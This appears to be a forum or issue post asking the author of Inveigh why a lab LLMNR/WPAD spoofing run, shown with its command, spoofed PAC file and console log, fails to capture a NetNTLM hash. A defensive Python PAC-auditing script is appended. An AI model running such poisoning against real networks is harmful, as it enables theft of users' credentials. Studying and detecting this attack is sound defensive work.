I'm running Inveigh on the "attacker" machine (192.168.100.101) from an elevated shell using these parameters:
Invoke-Inveigh -IP 192.168.100.101 -ConsoleOutput Y -Proxy Y -WPADAuth Anonymous
On the victim machine (192.168.100.23), sniffing traffic with Wireshark, I see the Inveigh host WPAD response:
function FindProxyForURL(url,host){ return "PROXY 192.168.100.101:8492; PROXY 192.168.100.101:8493; DIRECT";}
After that I'm seeing the target browser initiating a request through the proxy, receiving a 407 Unauthorized and executing the challenge response process:
The console output confirms the Wireshark output captured on the victim machine:
[+] [2020-04-09T18:57:51] LLMNR request for wpad received from 192.168.100.23 [response sent]
[+] [2020-04-09T18:57:51] TCP(80) SYN packet detected from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) GET request for /wpad.dat received from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) host header wpad received from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) user agent received from 192.168.100.23:59790:
Mozilla/4.0 (compatible; MSIE 7.0; Win32)
[+] [2020-04-09T18:57:51] TCP(8492) SYN packet detected from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) CONNECT request for www.google.es:443 received from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) host header www.google.es received from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) user agent received from 192.168.100.23:59791:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
[+] [2020-04-09T18:57:52] TCP(8492) SYN packet detected from 192.168.100.23:59792
[+] [2020-04-09T18:57:52] TCP(8493) SYN packet detected from 192.168.100.23:59793
[+] [2020-04-09T18:57:55] TCP(8493) SYN packet detected from 192.168.100.23:59793
Hello Kevin,
First, I would like to thank you for such a great tool.
Why is Inveigh not able to get the NetNTLM hash?
Thanks in advance!
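From the defender's side, the PAC body quoted in this post is the artifact to check on a client. The following is an added example, not part of the original post and not Inveigh code: it extracts the proxy directives from a `wpad.dat` body and flags entries that are not approved proxies. The approved-proxy list, the `audit_pac` and `pac_proxies` names, and the benign PAC are assumptions made for the example.

```python
import re
from ipaddress import ip_address

# PAC body as quoted in the post above.
PAC_BODY = ('function FindProxyForURL(url,host){ return "PROXY 192.168.100.101:8492; '
            'PROXY 192.168.100.101:8493; DIRECT";}')
# Assumption: the organisation's real proxy (hypothetical name and port).
APPROVED_PROXIES = {("proxy.corp.example", 8080)}

# Literal strings returned by FindProxyForURL, single or double quoted.
_RETURN_RE = re.compile(r"""return\s+(["'])(.*?)\1""", re.S)
# One directive, e.g. "PROXY host:port" or "SOCKS5 [::1]:1080".
_ENTRY_RE = re.compile(r"^(PROXY|HTTPS?|SOCKS[45]?)\s+(\[[^\]]+\]|[^:\s]+):(\d+)$", re.I)


def pac_proxies(pac_body):
    """Return (type, host, port) for each proxy directive; DIRECT is skipped."""
    found = []
    for _quote, directives in _RETURN_RE.findall(pac_body):
        for entry in directives.split(";"):
            m = _ENTRY_RE.match(entry.strip())
            if m:
                host = m.group(2).strip("[]").lower()
                found.append((m.group(1).upper(), host, int(m.group(3))))
    return found


def audit_pac(pac_body, served_by, approved):
    """List (endpoint, reasons) for proxy entries that look like WPAD spoofing.

    served_by is the address the client fetched wpad.dat from.
    """
    findings = []
    for _kind, host, port in pac_proxies(pac_body):
        reasons = []
        if (host, port) not in approved:
            reasons.append("not an approved proxy")
        if host == served_by:
            reasons.append("proxy is the host that served wpad.dat")
        try:
            if ip_address(host).is_private:
                reasons.append("literal private IP instead of a proxy name")
        except ValueError:
            pass  # host is a DNS name, not an IP literal
        if reasons:
            findings.append((f"{host}:{port}", reasons))
    return findings


if __name__ == "__main__":
    for endpoint, reasons in audit_pac(PAC_BODY, "192.168.100.101", APPROVED_PROXIES):
        print(endpoint, "->", "; ".join(reasons))
```

Correlating a finding with an LLMNR or NBT-NS answer for the name `wpad` shortly before the fetch, as in the console log above, strengthens the signal.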